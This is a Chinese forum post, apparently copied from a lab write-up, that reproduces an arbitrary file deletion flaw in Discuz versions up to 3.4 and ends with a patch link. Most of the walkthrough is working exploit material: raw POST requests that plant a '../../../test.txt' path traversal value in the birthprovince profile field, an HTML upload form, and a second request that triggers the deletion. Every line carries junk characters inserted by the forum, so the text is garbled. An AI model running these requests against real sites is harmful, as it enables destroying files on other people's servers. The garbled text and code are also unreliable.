|
|
9 g3 p; v! U Y6 o/ W; l
/ x( s1 ~ g( f前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
8 D% ?9 ~/ I6 \% V影响版本:Discuz < =3.4 环境: H- M G3 w8 F. l
7 B3 w& |" @1 s9 |- H! T5 U" n复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。: W* ~6 i8 d# L
新建test.txt8 P# f" V$ W& M0 P. ^
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。* p# R0 m5 t0 O
: h" c% E# O: X: W7 h
( h1 s5 s& v0 z- z( Q% m& e
查看formhash
8 g `) C& }0 X4 x+ W) S. S: j- N利用burp抓包,获取cookie* |! O5 i$ Z7 ?+ `
# \: f; m; f- V9 Q0 B \7 }
- \9 \6 w8 x' l( J2 e! C3 |& Y
0 N2 m- D3 l: \& n6 ^- Q
 ; C/ F) f" O6 W1 s
( A2 y) }2 w. A {) L3 t5 M抓取cookie. `( V% G. @* y! f" x& c& a
( ?7 o6 @6 R( Y6 \( t, b
发送下面数据包:修改cookie,formhash,还有删除的文件( c8 y. ]$ H' y; O2 D
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.17 @! H! A* {- S1 \0 b5 i; q n
Host: localhost
+ {# i g, m- Q4 H: V; M; zContent-Length: 367
w0 Z9 g% t) D& X+ kCache-Control: max-age=0
/ ~2 n: n9 A4 |Upgrade-Insecure-Requests: 16 q! I1 C" K' g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
2 o! }) J- |4 W& M4 V$ w- }" SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36) ?+ I% X- ^$ G7 S* B2 @2 i( o' v' }7 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
, R1 A, E6 T/ H, P2 wAccept-Encoding: gzip, deflate. y. _: ]4 \: Z4 q4 f0 c
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
" N; D5 e% Y) TCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
8 L( X3 S3 T/ o4 N: _Connection: close; T" c s I V" e
------WebKitFormBoundaryPFvXyxL45f34L12s/ w- i: ` R9 o
Content-Disposition: form-data; name="formhash"
/ h2 h" b4 V2 j9 u( r* [5 n84a7f376- c9 D3 @- y0 C E# T% S0 o) V
------WebKitFormBoundaryPFvXyxL45f34L12s) ]8 a# V5 S* A" y: \+ ~$ z6 u7 T( A
Content-Disposition: form-data; name="birthprovince"
6 B% T9 B2 a* E- v../../../test.txt( W' w6 X" K3 W3 I1 B
------WebKitFormBoundaryPFvXyxL45f34L12s: B9 a# t, |6 V7 F9 Z
Content-Disposition: form-data; name="profilesubmit"
+ Z/ ]7 ?) v+ x6 {: K7 M7 n* a18 Q/ m7 c, @ c8 p
------WebKitFormBoundaryPFvXyxL45f34L12s--: g# V X1 B2 t. l1 V! r7 p
发送删除的数据包
* u; E* W5 M6 |' y% Z/ B刷新页面,查看出生地就会显示成下图所示的状态:3 B; B7 i& J6 K9 {7 t# D
数据成功写入5 O/ O6 E- @/ C* t# {$ G) v# ~* S
( M/ ^& W) R% J% e: _ n j
$ ^2 t9 z6 e) b# M3 Y* \说明数据已经进入数据库: B t; r4 y! n _
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
2 ^- U. Y0 ^ \<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
" Z+ V+ p* m/ O/ [<input type="file"name="birthprovince" id="file" />0 r) \3 b; e" V' g. y7 g: `
<input type="text"name="formhash" value="84a7f376"/></p>7 s) N2 }* p6 Q& z9 y# w
<input type="text"name="profilesubmit" value="1"/></p>6 T: u+ p8 d7 ^5 ^1 A* c2 b
<input type="submit"value="Submit" />
( |: G, {* W1 D/ b</from>0 v7 _3 Y; {9 Q3 `
1 N/ x/ H2 Y6 p1 o/ i
, O% v [- @7 {0 c7 P( b
( H' v. T2 V& l' J8 T6 g" c% J' W9 W+ o& z
$ k* s6 y, I# {8 @5 n+ M
或者直接构建数据包:
d6 O1 ?5 Z) G, g* L8 T% @+ D- nPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
# g8 j, y) C* Y0 ?4 N4 UHost: 192.168.220.131! t A8 D) o% Q$ f7 f! f- }+ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.03 t/ c9 k9 G* l& e" o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: j; j! \' v; W+ S) n2 n; \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: H; h: B' T8 J. N# o. Z* k
Accept-Encoding: gzip, deflate
: e; P3 g+ B# H7 LContent-Type: multipart/form-data; boundary=---------------------------123821742118716: `) {( F6 E7 {) A( }
Content-Length: 91989/ q5 Y- l8 h( S3 B0 Q. B# c' a: E
Connection: close
( M2 P% ]2 ~( K: mCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
& {+ @. `: Q' i- Z6 k! yUpgrade-Insecure-Requests: 1" A% _# c8 _# f# h: m
-----------------------------123821742118716! U$ f9 b- @8 i6 G- [% J
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"" a* E* X) ?" V2 h; v+ G
Content-Type: image/jpeg) X& k8 G/ ]: V0 `
zerba(这里写啥都可以)% _3 B/ O7 ^" \! A! i! @0 N9 y c
-----------------------------123821742118716--+ q6 c+ i+ [& I# k, i9 t
# d+ I/ d/ _7 ?& z. v) h8 W! X
6 A. z1 |" n2 \ E3 s1 ]' ^+ S0 S
9 B$ i+ ^# ]6 r' E0 n
* U& s5 d. h* [% R* y3 I6 [1 H! y1 b A
A" ]- m: G' G. D+ P9 b6 Q0 I$ e$ U+ ` T& S8 l, M
& u+ m& F$ q/ S1 L; F" f
4 d4 p* G/ g# u' C Z
^9 \# w0 L# o
+ j" k/ S4 u' C* X1 Y) [进去discuz看看,可以看到,test.txt文件已经被删除了。! B! \/ g; T p' d# v- h3 c
- e5 P% I% i1 `$ @) J, ?! y
- D$ ~+ {! l/ r( U+ z- y
0 X, _# n: M# h. ?% _4 r7 e
, z2 K3 j- W% }7 E( i
8 g! e* G9 x r8 O修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574 Q( i6 [2 @7 _8 y- h
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
% B, ^+ V0 H s; w j" ^) S- r# t& Y# ^8 B; M
; T* X9 P' u) J; N: n2 q' H$ y6 s9 K- G+ P, W
^# M& [( D2 V! h) E* U d9 o! e, m" W5 q
" x6 p2 h) C' [3 v0 }3 ]0 U
1 @& `& p( b6 A; n- R; I& y& ^; p1 [# Z2 K) ^0 u% v! u
0 t/ N/ ?" Q' X0 c- n0 x/ Z |
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜